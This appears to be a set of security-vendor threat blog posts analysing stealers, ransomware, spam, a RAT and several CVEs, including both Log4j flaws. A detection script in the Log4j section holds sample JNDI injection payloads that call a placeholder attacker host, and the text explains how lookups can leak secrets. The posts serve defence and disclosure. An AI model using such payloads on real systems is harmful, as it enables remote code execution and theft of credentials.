Posts

Open source stealer malware, Mercurial, for "educational purposes" spotted in the wild

The SonicWall Capture Labs threat research team has come across data theft malware derived from the Mercurial password stealer family. This malware is open source and readily available on GitHub “for educational purposes only”. Because it is open source, it can be easily customized and deployed with little programming expertise. The malware is written in C# and is trivial to decompile.

 

Infection Cycle:

 

Upon infection, the malware copies itself to %APPDATA\Local\Temp\.  It also adds itself to the registry so that it is started after each reboot:

 

It scans the system for browser profile information:

 

In addition to searching for browser data, it also searches for Minecraft launch profile files and Discord Level DB files:

 

It contains a very basic level of anti-debugging:

 

Any information that is gathered from the system is sent via an HTTP POST request to the operator:

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Blitzed.N (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Apache Log4j StrSubstitutor Vulnerability

Overview:

  Apache Log4j is a logging library for Java. Log4j is a simple and flexible logging framework. With Log4j it is possible to enable logging at runtime without modifying the application binary. Apache Log4j is part of a project which is known as Apache Logging. The Log4j package is designed so that the logging statements can remain in shipped code without incurring a heavy performance cost. Logging behaviour can be controlled by editing a configuration file, without touching the application binary.

  An uncontrolled recursion vulnerability has been reported in the StrSubstitutor class of Apache Log4j. This vulnerability is due to improper handling of logged messages when the logging configuration uses a non-default Pattern Layout with a Context Map Lookup, Map Lookup, or Structured Data Lookup.

  A remote attacker who can control an item in the Thread Context Map or a MapMessage or StructuredDataMessage can exploit this vulnerability by sending a specially crafted parameter to the target application. Successful exploitation could result in a denial-of-service condition due to a crash of the Log4j service.

  Vendor: Logging Apache

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-45105

  See: CVE-ID

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C).

  Base score is 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is none.
    • Impact of this vulnerability on data integrity is none.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 6.5 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  NVD CVSS Metrics

Technical Overview:

  An uncontrolled recursion vulnerability has been reported in the StrSubstitutor class of Apache Log4j. This vulnerability is due to improper handling of logged messages when the logging configuration uses a non-default Pattern Layout with a Context Map Lookup, Map Lookup, or Structured Data Lookup. When a variable is included in a lookup string, it is resolved by calling the substitute() method of the class org.apache.logging.log4j.core.lookup.StrSubstitutor.

  Once the marker for the end of a variable is found, the substitute() method is called recursively with the variable to be substituted. The method checkCyclicSubstitution() is called with each variable substitution, to detect infinite substitution loops. This method maintains a list of previously encountered variables in a variable named priorVariables. After the variable is resolved using the resolveVariable() method, the substitute() function is called recursively with the resolved content, to resolve any variables included in the result. However, when a variable is detected in the resolved content, substitute() is called recursively without supplying the priorVariables variable. Therefore, if a variable resolves to a nested lookup containing the same variable, it won’t be detected by the checkCyclicSubstitution() method, resulting in uncontrolled recursion.

  A remote attacker who can control an item in the Thread Context Map or a MapMessage or StructuredDataMessage can exploit this vulnerability by setting the item to an appropriate lookup containing a nested reference to itself. For example, if the attacker can control the value of the apiversion Thread Context Map item, they could set its value to the following string:

  

  Successful exploitation could result in a StackOverflowError due to uncontrolled recursion, leading to a denial of service condition due to a crash of the Log4j service.
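To make the control-flow defect concrete, here is an added toy model of the substitute() / checkCyclicSubstitution() interaction (example code written for this page, not Log4j's own implementation). The lookup sources, the self-referencing context item and the depth guard are all constructed for the demonstration; the "ctx" prefix stands in for the Thread Context Map lookup.

```python
import re

# Innermost ${...} reference (no nested braces inside), e.g. ${ctx:apiversion}
LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# Constructed lookup sources: "ctx" stands in for the Thread Context Map lookup.
SOURCES = {
    "ctx": {
        "user": "alice",
        "a": "${ctx:b}",                    # nested but terminating reference
        "b": "ok",
        "apiversion": "${ctx:apiversion}",  # constructed self-reference
    }
}


class CyclicSubstitutionError(Exception):
    """Raised when a variable refers back to itself, directly or via its resolved value."""


def resolve_variable(name, sources):
    """Mimics resolveVariable(): 'prefix:key' -> value, or None when unresolvable."""
    prefix, _, key = name.partition(":")
    return sources.get(prefix, {}).get(key)


def substitute(text, sources, propagate_prior, prior=None, depth=0):
    """Expand every ${...} in text, recursing into resolved values.

    propagate_prior=False models the defect described above: the recursive call
    on the resolved content starts with an empty priorVariables list, so the
    cycle check never sees the variable that is already being expanded.
    propagate_prior=True hands the list down, which closes the hole.
    """
    if depth > 50:  # constructed guard so the toy fails fast instead of exhausting the stack
        raise RecursionError("uncontrolled recursion: substitution never terminates")
    prior = list(prior or [])
    out, pos = [], 0
    for m in LOOKUP.finditer(text):
        name = m.group(1)
        # checkCyclicSubstitution(): refuse a variable that is already being expanded
        if name in prior:
            raise CyclicSubstitutionError(f"cyclic substitution of ${{{name}}}")
        value = resolve_variable(name, sources)
        if value is None:
            value = m.group(0)  # unresolvable: keep the literal text
        else:
            nested_prior = prior + [name] if propagate_prior else []
            # recursive substitute() on the resolved content
            value = substitute(value, sources, propagate_prior, nested_prior, depth + 1)
        out.append(text[pos:m.start()])
        out.append(value)
        pos = m.end()
    out.append(text[pos:])
    return "".join(out)


def outcome(layout, sources, propagate_prior):
    """Classify what rendering this layout does: the expanded text,
    'cycle-detected' (safe failure) or 'uncontrolled-recursion' (the DoS)."""
    try:
        return substitute(layout, sources, propagate_prior)
    except CyclicSubstitutionError:
        return "cycle-detected"
    except RecursionError:
        return "uncontrolled-recursion"


if __name__ == "__main__":
    layout = "ver=${ctx:apiversion} user=${ctx:user}"
    print("defective:", outcome(layout, SOURCES, propagate_prior=False))
    print("fixed:    ", outcome(layout, SOURCES, propagate_prior=True))
```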

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • Target needs a non-default Pattern Layout with a Context Map Lookup, Map Lookup, or Structured Data Lookup.
  • Target must accept untrusted input within the Thread Context Map, MapMessage, or StructuredDataMessage.
  • The attacker must have network connectivity to the vulnerable server.

Triggering Conditions:

  The attacker sends a maliciously crafted parameter to the vulnerable server. The server adds the parameter to a Thread Context Map, MapMessage, or StructuredDataMessage and logs a message. The vulnerability is triggered when the server parses the lookup included in the parameter.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS:15738 Apache Log4j Self-Referential Lookup DoS (CVE-2021-45105) 1

  • IPS:15739 Apache Log4j Self-Referential Lookup DoS (CVE-2021-45105) 2

  • IPS:15740 Apache Log4j Self-Referential Lookup DoS (CVE-2021-45105) 3

  • IPS:18663 Apache Log4j Self-Referential Lookup DoS (CVE-2021-45105) 4

  Please note that if your web service/server is accessible over HTTPS, then enabling Server DPI-SSL is necessary for the above signatures to detect exploits targeting this vulnerability.

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor supplied patch.
    • Removing Context Map Lookups, Map Lookups, and Structured Data Lookups from the application's Pattern Layout.
    • Detecting and blocking malicious traffic using the signatures above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Github hosted Android ransomware being misused in the wild

GitHub is a platform commonly used to host open-source projects, many of which are security focused. The SonicWall Threats Research team recently identified an Android ransomware that was found to be hosted on GitHub as an educational project.

 

Initial Discovery

We identified an Android APK (MD5: 6dc068db642247295e96437d8aca60a0) as malicious and, upon inspecting its code, found some interesting breadcrumbs which led us to the GitHub repository that was the origin of this threat. A simple search for the package name of this threat, com.termuxhackers.id, led us to the following GitHub repository:

 

One of the repositories hosted here is SARA – Simple Android Ransomware Attack:

 

We identified a number of malicious apps on a number of platforms that were spawned from this codebase. Many of these apps masquerade as popular legitimate applications; a few are listed below:

We identified more than 200 apps that have been created using this codebase.

 

Creating the ransomware

While building the apk, this kit asks the user to enter an unlock code:

 

Once executed, a screen with the user-entered text is overlaid on the display and the victim cannot use the phone. Strings present in strings.xml in the app's resource folder are used on the ransom screen.

 

 

The unlock key is hardcoded in plaintext within the APK; it is supplied by the user during app creation:

 

We analyzed a number of malicious APKs; one instance in particular stood out, where the ransom demand was 50 BTC:

 

Overall, this repository appears to have been created and distributed on GitHub for educational purposes. However, we identified a high number of apps created from this repository with legitimate app icons and application names. Whether these were created as a prank, with malicious intent, or to legitimately learn how ransomware works is yet to be determined.

 

Sonicwall Capture Labs provides protection against this threat using the signature listed below:

  • AndroidOS.Termux.RSM

 

Indicators of Compromise:

  • 00dc92f14326c7b0e87e877bfd12a7df
  • 6b9157e059da44f13843e682ac3bcba7
  • 6dc068db642247295e96437d8aca60a0

Spam Campaign Roundup: Christmas Holiday 2021 Edition

With Christmas weekend upon us and many people still looking for the best last-minute deals, we have noticed an increasing amount of holiday-related spam email. We have been monitoring the amount of spam received this month and noticed a trend where the amount increases during weekends. This is not surprising, since consumers are spending more time shopping online, so cybercriminals have become more aggressive and creative with their tactics.

The following are some of the common email subjects:

  • Don’t Wait! 80% off Christmas Sale
  • Christmas Sale Find the Perfect Gifts Now
  • Congratulations! You can get <insert merchant> $50 gift card!
  • Save up to 80% off on the perfect gift for everyone
  • Get a Drone as a gift
  • Ahoy! Christmas Special!
  • Hottest Christmas Gifts of 2021

Most of these emails purport to come from popular department stores promising gift cards; when clicked, they take you to a URL different from the real merchant’s website. The consumer is then asked to enter their personal information and to participate in a number of “offers”, often costing money in fees or subscriptions, without any guarantee of ever receiving the products and services or the free gift card at the end of the process.

One new tactic observed this year was the use of shortened URLs to mask the real website address the link leads to, adding a layer of trickery to fool users into following links they otherwise wouldn’t click.

Another new trick this year was adding a captcha to determine whether the user is actually a human or a bot.

They now also add a countdown timer to increase urgency and drive victims to act.

Rewards are too good to be true.

In this example, the user is asked to pay a small amount to ship the reward, which requires handing over their credit card information.

We urge our users to always be vigilant and cautious with any unsolicited email and to avoid providing any personal information, particularly if you are not certain of the source.

SonicWALL Capture Labs Gateway Antivirus and Email Security service constantly monitor and provide protection against such malicious spam and phishing threats.

 

Yealink Device Management Command Injection Vulnerability

SonicWall Capture Labs threat research team observed attacks exploiting a vulnerability in Yealink devices.

Yealink’s powerful GUI-driven Yealink Device Management Platform delivers a comprehensive set of tools for implementing up to 5,000 Microsoft-certified Yealink Skype for Business IP phones. The platform solves the complexities of provisioning, management, call quality control and troubleshooting. The solution allows system-wide oversight and the ability to drill down into specific needs for various regions, user groups or even a particular device model.

Yealink Device Management Command Injection Vulnerability | CVE-2021-27561
A command injection vulnerability exists in Yealink Device Management. It allows command injection as root via the URI, without authentication.

Yealink DM server does not filter the user provided data which allows remote unauthenticated attackers to execute arbitrary commands.

In the above exploit, the attacker is able to bypass authentication and download and execute a malicious script from an attacker-controlled server.

The following versions are vulnerable:

  • Yealink Device Management (DM) 3.6.0.20

SonicWall Capture Labs provides protection against this threat via the following signature:

      • IPS 15456: Yealink DM Remote Code Execution

IoCs

  • 03f37a12673fd7ad01b744f84b61aad062a5b6eafbeb7aeac4a00ef28159ad80
  • 203.159.80.241

Threat Graph

GarrantDecrypt ransomware operator charges $5000 for decryption. Price negotiable.

The SonicWall Capture Labs threat research team has been tracking ransomware, known to some in the antivirus community as GarrantDecrypt.  The current variant of this ransomware appeared in late November 2021.  The malware is aimed at infecting casual PC users rather than large corporations.  The ransom charge for file decryption is relatively cheap at $5000 in BTC.  This is significantly lower than what we have seen with most ransomware and the price can be negotiated down further with the operator.

 

Infection Cycle:

 

Upon infection, files on the system are encrypted.  Each encrypted file is given a “.decrypt” extension.  #file.decrypt#.txt is dropped into every directory containing encrypted files:

 

#file.decrypt#.txt contains the following message:

 

The malware disables various security policies on the system.  This can be seen in the decompiled code:

 

Only the encryption routine is present in the malware. Decryption requires a separate program provided by the operator:

 

We reached out to file.decrypt@yahoo.com and had the following conversation with the operator who appears to be German:

 

 

After a brief negotiation, we were able to have the price reduced:

 

 

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: GarrantDecrypt.N (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

AveMaria RAT is being delivered using ISO files

Threat actors are using low-profile file types to propagate malware, as these are overlooked by much security software. One of them is the optical disc image (ISO image), which is treated as a trusted file type. ISO files are being abused by threat actors to deliver payloads to the victim’s machine without being detected. The SonicWall RTDMI™ engine has recently detected a number of ISO files, delivered as email attachments, which execute the AveMaria RAT on the victim’s machine.

The malware also uses the .scr file extension and a long file name containing many special characters, which can also work as an evasion technique against some security software:

 

The ISO contains a .NET executable which performs a 1.5-second sleep operation 9 times, then downloads binary data from a URL. The downloaded data is reversed to create a valid AveMaria Dynamic Link Library (DLL) file:

 

The AveMaria DLL is then executed by calling one of its exported functions:

AveMaria RAT

AveMaria malware behaves as an infostealer, keylogger and Remote Access Trojan (RAT). Analysis of the code suggests the malware is also working on modifying Remote Desktop Services (termsrv.dll) to allow concurrent access by multiple users. The malware steals data from various apps installed on the victim’s machine, including Microsoft Outlook and Mozilla Thunderbird.

The malware copies RegAsm.exe into the %temp% directory and executes it in order to inject malicious code into the process:

 

List of web browsers targeted by the malware to steal stored credentials:

  • Microsoft Edge
  • UC Browser
  • QQ Browser
  • Opera
  • Blisk
  • Chromium
  • Brave
  • Vivaldi
  • Comodo Dragon
  • Torch
  • SlimJet
  • CentBrowser

 

Only a few security providers were detecting the ISO file at the time of analysis on popular threat intelligence sharing portals such as VirusTotal and ReversingLabs, which indicates its uniqueness and evasiveness:

 

Evidence of the detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file:

Microsoft Security Bulletin Coverage for December 2021

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of December 2021. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2021-41333 Windows Print Spooler Elevation of Privilege Vulnerability
ASPY 272:Malformed-File exe.MP_221

CVE-2021-43207 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 274:Malformed-File exe.MP_223

CVE-2021-43226 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 276:Malformed-File exe.MP_225

CVE-2021-43233 Remote Desktop Client Remote Code Execution Vulnerability
ASPY 273:Malformed-File exe.MP_222

CVE-2021-43883 Windows Installer Elevation of Privilege Vulnerability
ASPY 275:Malformed-File exe.MP_224

The following vulnerabilities do not have known exploits in the wild:
  • CVE-2021-40441 Windows Media Center Elevation of Privilege Vulnerability
  • CVE-2021-40452 HEVC Video Extensions Remote Code Execution Vulnerability
  • CVE-2021-40453 HEVC Video Extensions Remote Code Execution Vulnerability
  • CVE-2021-41360 HEVC Video Extensions Remote Code Execution Vulnerability
  • CVE-2021-41365 Microsoft Defender for IoT Remote Code Execution Vulnerability
  • CVE-2021-42293 Microsoft Jet Red Database Engine and Access Connectivity Engine Elevation of Privilege Vulnerability
  • CVE-2021-42294 Microsoft SharePoint Server Remote Code Execution Vulnerability
  • CVE-2021-42295 Visual Basic for Applications Information Disclosure Vulnerability
  • CVE-2021-42309 Microsoft SharePoint Server Remote Code Execution Vulnerability
  • CVE-2021-42310 Microsoft Defender for IoT Remote Code Execution Vulnerability
  • CVE-2021-42311 Microsoft Defender for IoT Remote Code Execution Vulnerability
  • CVE-2021-42312 Microsoft Defender for IOT Elevation of Privilege Vulnerability
  • CVE-2021-42313 Microsoft Defender for IoT Remote Code Execution Vulnerability
  • CVE-2021-42314 Microsoft Defender for IoT Remote Code Execution Vulnerability
  • CVE-2021-42315 Microsoft Defender for IoT Remote Code Execution Vulnerability
  • CVE-2021-42320 Microsoft SharePoint Server Spoofing Vulnerability
  • CVE-2021-43214 Web Media Extensions Remote Code Execution Vulnerability
  • CVE-2021-43215 iSNS Server Memory Corruption Vulnerability Can Lead to Remote Code Execution
  • CVE-2021-43216 Microsoft Local Security Authority Server (lsasrv) Information Disclosure Vulnerability
  • CVE-2021-43217 Windows Encrypting File System (EFS) Remote Code Execution Vulnerability
  • CVE-2021-43219 DirectX Graphics Kernel File Denial of Service Vulnerability
  • CVE-2021-43222 Microsoft Message Queuing Information Disclosure Vulnerability
  • CVE-2021-43223 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability
  • CVE-2021-43224 Windows Common Log File System Driver Information Disclosure Vulnerability
  • CVE-2021-43225 Bot Framework SDK Remote Code Execution Vulnerability
  • CVE-2021-43227 Storage Spaces Controller Information Disclosure Vulnerability
  • CVE-2021-43228 SymCrypt Denial of Service Vulnerability
  • CVE-2021-43229 Windows NTFS Elevation of Privilege Vulnerability
  • CVE-2021-43230 Windows NTFS Elevation of Privilege Vulnerability
  • CVE-2021-43231 Windows NTFS Elevation of Privilege Vulnerability
  • CVE-2021-43232 Windows Event Tracing Remote Code Execution Vulnerability
  • CVE-2021-43234 Windows Fax Service Remote Code Execution Vulnerability
  • CVE-2021-43235 Storage Spaces Controller Information Disclosure Vulnerability
  • CVE-2021-43236 Microsoft Message Queuing Information Disclosure Vulnerability
  • CVE-2021-43237 Windows Setup Elevation of Privilege Vulnerability
  • CVE-2021-43238 Windows Remote Access Elevation of Privilege Vulnerability
  • CVE-2021-43239 Windows Recovery Environment Agent Elevation of Privilege Vulnerability
  • CVE-2021-43240 NTFS Set Short Name Elevation of Privilege Vulnerability
  • CVE-2021-43242 Microsoft SharePoint Server Spoofing Vulnerability
  • CVE-2021-43243 VP9 Video Extensions Information Disclosure Vulnerability
  • CVE-2021-43244 Windows Kernel Information Disclosure Vulnerability
  • CVE-2021-43245 Windows Digital TV Tuner Elevation of Privilege Vulnerability
  • CVE-2021-43246 Windows Hyper-V Denial of Service Vulnerability
  • CVE-2021-43247 Windows TCP/IP Driver Elevation of Privilege Vulnerability
  • CVE-2021-43248 Windows Digital Media Receiver Elevation of Privilege Vulnerability
  • CVE-2021-43255 Microsoft Office Trust Center Spoofing Vulnerability
  • CVE-2021-43256 Microsoft Excel Remote Code Execution Vulnerability
  • CVE-2021-43875 Microsoft Office Graphics Remote Code Execution Vulnerability
  • CVE-2021-43877 ASP.NET Core and Visual Studio Elevation of Privilege Vulnerability
  • CVE-2021-43880 Windows Mobile Device Management Elevation of Privilege Vulnerability
  • CVE-2021-43882 Microsoft Defender for IoT Remote Code Execution Vulnerability
  • CVE-2021-43888 Microsoft Defender for IoT Information Disclosure Vulnerability
  • CVE-2021-43889 Microsoft Defender for IoT Remote Code Execution Vulnerability
  • CVE-2021-43891 Visual Studio Code Remote Code Execution Vulnerability
  • CVE-2021-43893 Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability
  • CVE-2021-43896 Microsoft PowerShell Spoofing Vulnerability
  • CVE-2021-43899 Microsoft 4K Wireless Display Adapter Remote Code Execution Vulnerability
  • CVE-2021-43905 Microsoft Office app Remote Code Execution Vulnerability
  • CVE-2021-43907 Visual Studio Code WSL Extension Remote Code Execution Vulnerability

Apache Log4j Remote Code Execution Vulnerability

Overview:

Apache Log4j is a Java-based logging utility that can be configured through a configuration file or through Java code. Apache Log4j provides many features, such as reliability, extensibility, multiple configuration support including xml/json/yaml, excellent performance and more.

A JNDI Injection vulnerability has been reported in the JndiManager class of Apache Log4j. This vulnerability is due to improper handling of logged messages.

A remote, unauthenticated attacker who can control log message contents can exploit this vulnerability by sending a specially crafted parameter to the target application. Successful exploitation results in information disclosure or remote code execution.

CVE Reference:

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-44228.

Common Vulnerability Scoring System (CVSS):

The overall CVSS score is 9.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C).

Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is changed.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Temporal score is 9.3 (E:F/RL:O/RC:C), based on the following metrics:

  • The exploit code maturity level of this vulnerability is functional.
  • The remediation level of this vulnerability is official fix.
  • The report confidence level of this vulnerability is confirmed.

Technical Overview:

The Java Naming and Directory Interface (JNDI) is a Java API for directory services that allows Java software clients to discover and look up data and resources (in the form of Java objects) by name. JNDI supports many services, including the Lightweight Directory Access Protocol (LDAP), the Domain Name System (DNS) and so on. Apache Log4j supports performing many lookups, including JNDI lookups.

The JNDI lookup feature in vulnerable versions of Apache Log4j 2.x allows values to be added at arbitrary places in the Log4j configuration. Log4j has a special syntax of the form ${lookup_name:key} (where lookup_name is one of the available lookups and key is the attribute to be evaluated). When an attacker includes the string ${ in a request, Log4j attempts to write it into the log data; while doing so, the lookup method is called, which finds the strings after ${ and attempts to replace them with the actual values. For instance, ${env:COMPUTERNAME} becomes the actual computer name (e.g. TEST-PC) and ${env:AWS_ACCESS_KEY_ID} becomes the actual AWS secret key.

The JNDI lookups are enabled by default in vulnerable versions of Log4j 2.x, and inputs are not sanitized, allowing attackers to send maliciously crafted requests to a web server or application that uses Log4j. The application will then respond with the evaluated strings.

The majority of attacks use the LDAP protocol, as in the publicly available POCs, but attackers are also trying to leverage other protocols such as RMI, LDAPS, HTTP(S), DNS, IIOP, CORBA, NIS and NDS. Payloads are found in different sections of the HTTP request, such as the URI, parameters, headers such as User-Agent and Referer, and the request body, as attackers try to get the payload logged by any means so that it is parsed by the vulnerable Log4j.

This has become the most widely exploited in-the-wild vulnerability in recent times. We are seeing a wide range of mutations in the payloads as attackers try to evade the protection or detection in place, for example base64-encoded data. SonicWall has released multiple signatures to protect its customers.
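As an added example (not SonicWall's signature logic), the following script scans the request line, headers and body of constructed HTTP requests for a JNDI lookup using any of the schemes named above, percent-decoding the request line first so a payload placed in the URI or query string is compared in the same form as one placed in a header; attacker.example is a placeholder host, not a real indicator.

```python
import re
from urllib.parse import unquote

# JNDI URL schemes discussed above (CORBA spelled as the JNDI scheme name)
JNDI_SCHEMES = ("ldap", "ldaps", "rmi", "dns", "iiop", "corba", "nis", "nds", "http", "https")
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(" + "|".join(JNDI_SCHEMES) + r")\s*:", re.IGNORECASE
)


def normalize(value):
    """Undo percent-encoding (applied up to twice) so a lookup hidden in a URI
    or query string compares the same as one placed in a header or body."""
    for _ in range(2):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (request line, headers dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers, body


def find_jndi_lookups(raw):
    """Return [(location, scheme), ...] for every JNDI lookup in the request."""
    request_line, headers, body = parse_request(raw)
    fields = [("request-line", request_line)]
    fields += [("header:" + name, value) for name, value in headers.items()]
    fields.append(("body", body))
    hits = []
    for location, value in fields:
        for m in JNDI_LOOKUP.finditer(normalize(value)):
            hits.append((location, m.group(1).lower()))
    return hits


# Constructed sample requests; attacker.example is a placeholder host, not a real IoC.
SAMPLE_REQUESTS = {
    "user-agent": (
        "GET /index.html HTTP/1.1\r\n"
        "Host: www.example.com\r\n"
        "User-Agent: ${jndi:ldap://attacker.example/a}\r\n\r\n"
    ),
    "encoded-uri": (
        "GET /search?q=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fx%7D HTTP/1.1\r\n"
        "Host: www.example.com\r\n\r\n"
    ),
    "body": (
        "POST /login HTTP/1.1\r\n"
        "Host: www.example.com\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        "user=${JNDI:DNS://attacker.example/id}&pass=x"
    ),
    "benign": (
        "POST /login HTTP/1.1\r\n"
        "Host: www.example.com\r\n\r\n"
        "user=alice&note=${amount}"
    ),
}


if __name__ == "__main__":
    for label, raw in SAMPLE_REQUESTS.items():
        print(label, "->", find_jndi_lookups(raw) or "clean")
```

A signature that only matches the literal `${jndi:` in one field will miss the percent-encoded URI case, which is why each field is decoded before matching.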

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network connectivity to the vulnerable server.

Triggering Conditions:

The attacker sends a maliciously crafted parameter to the vulnerable server. The server logs the parameter using Log4j. The vulnerability is triggered when the server parses the JNDI lookup included in the log message.

SonicWall Capture Labs Threat Research is aware of the vulnerability in the Log4j Java-based logging library and has released the following IPS signatures to detect exploitation attempts related to CVE-2021-44228:

  • IPS: 2307 Apache Log4j2 JNDI Log Messages Remote Code Execution
  • IPS: 2067 Apache Log4j2 JNDI Log Messages Remote Code Execution LDAPS
  • IPS: 15732 Apache Log4j2 JNDI Log Messages Remote Code Execution NIS
  • IPS: 15733 Log4j2 JNDI Log Messages Remote Code Execution NDS
  • IPS: 15734 Apache Log4j2 JNDI Log Messages Remote Code Execution COBRA
  • IPS: 15735 Apache Log4j2 JNDI Log Messages Remote Code Execution RMI
  • IPS: 15736 Apache Log4j2 JNDI Log Messages Remote Code Execution IIOP
  • IPS: 15737 Apache Log4j2 JNDI Log Messages Remote Code Execution DNS 2
  • IPS: 2311 Apache Log4j2 JNDI Log Messages Remote Code Execution HTTP
  • IPS: 2315 Apache Log4j2 JNDI Log Messages Remote Code Execution DNS
  • IPS: 2328 Apache Log4j2 JNDI Log Messages Remote Code Execution HTTPS

Please note that if your web service/server is accessible over HTTPS, then enabling Server DPI-SSL is necessary for the above signatures to detect exploits targeting this vulnerability.

SonicWall’s Web Application Firewall (WAF) provides protection against this threat:

  • WAF: 1116 Apache Log4j2 JNDI Log Messages Remote Code Execution

Remediation Details:

The risks posed by this vulnerability can be mitigated or eliminated by:

  • Enabling the IPS signatures mentioned above on SonicWall firewalls.
  • Enabling the Web Application Firewall signature above.
  • Updating to a non-vulnerable version of the product or applying the vendor supplied patch.
  • Removing the JndiLookup class from the classpath.

The vendor has released the following advisory regarding this vulnerability:
Vendor Advisory

Zoho ManageEngine Arbitrary File Upload Vulnerability

Overview:

  ManageEngine ServiceDesk is an IT help desk platform that provides functionality to manage various aspects of an IT environment, such as changes, incidents and assets, and also incorporates a standard ITIL framework. ManageEngine SupportCenter Plus is web-based customer support software that lets organizations effectively manage customer tickets, their account and contact information, and service contracts. Code and features are extensively shared between these two applications.

  An arbitrary file upload vulnerability has been reported in Zoho ManageEngine ServiceDesk Plus, ServiceDesk Plus MSP, and SupportCenter Plus. The vulnerability is due to an unspecified flaw related to the /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.

  A remote attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could allow the attacker to execute arbitrary code with privileges of SYSTEM.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-44077.

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.7 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.7 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Technical Overview:

  ManageEngine ServiceDesk/SupportCenter includes features for configuring technician information. The IT help desk team comprises the help desk team manager, help desk agents, and the technicians who handle the requests posted or raised by requesters from different accounts. A user can add, edit, or remove technicians in the application and grant them the access privileges that suit their role and needs. A user can also view the list of technicians in a particular account and/or site by selecting the account from the Accounts combo box and the site from the Technicians for combo box. The feature relevant to this vulnerability is importing technician information from a comma-separated (CSV) file into the application. Note that this is a legacy feature that is no longer available in either the unpatched (at least in the versions 11012 and 11012) or the patched version of the SupportCenter Plus application.

  This feature is accessible via the Apache Struts action ImportTechnicians defined in struts-config.xml, which is mapped to the request URL “/RestAPI/ImportTechnicians”. An unrestricted arbitrary file upload vulnerability exists in the ManageEngine ServiceDesk Plus, ServiceDesk Plus MSP and SupportCenter Plus products. The vulnerability is due to improper validation of the filename parameter.

  When a user sends a POST request to /RestAPI/ImportTechnicians with a Content-Type header of multipart/form-data, the execute method of the class com.adventnet.servicedesk.setup.action.ImportTechniciansAction is eventually called. The execute method uses the value of the filename attribute of the Content-Disposition header in the request body to write the contents of the file into the “\SupportCenterPlus\bin” or “\ServiceDesk\bin” directory (depending on the specific ManageEngine product).

  The uploaded file is not checked for the expected “.csv” extension. Note that directory traversal is not possible, because the Java classes org.apache.struts.upload.CommonsMultipartRequestHandler and org.apache.struts.upload.CommonsMultipartRequestHandler.CommonsFormFile from struts.core-1.3.11.jar are used by the application to remove from the filename parameter all characters up to the last ‘/’ or ‘\’ character before the vulnerable code in com.adventnet.servicedesk.setup.action.ImportTechniciansAction is reached.

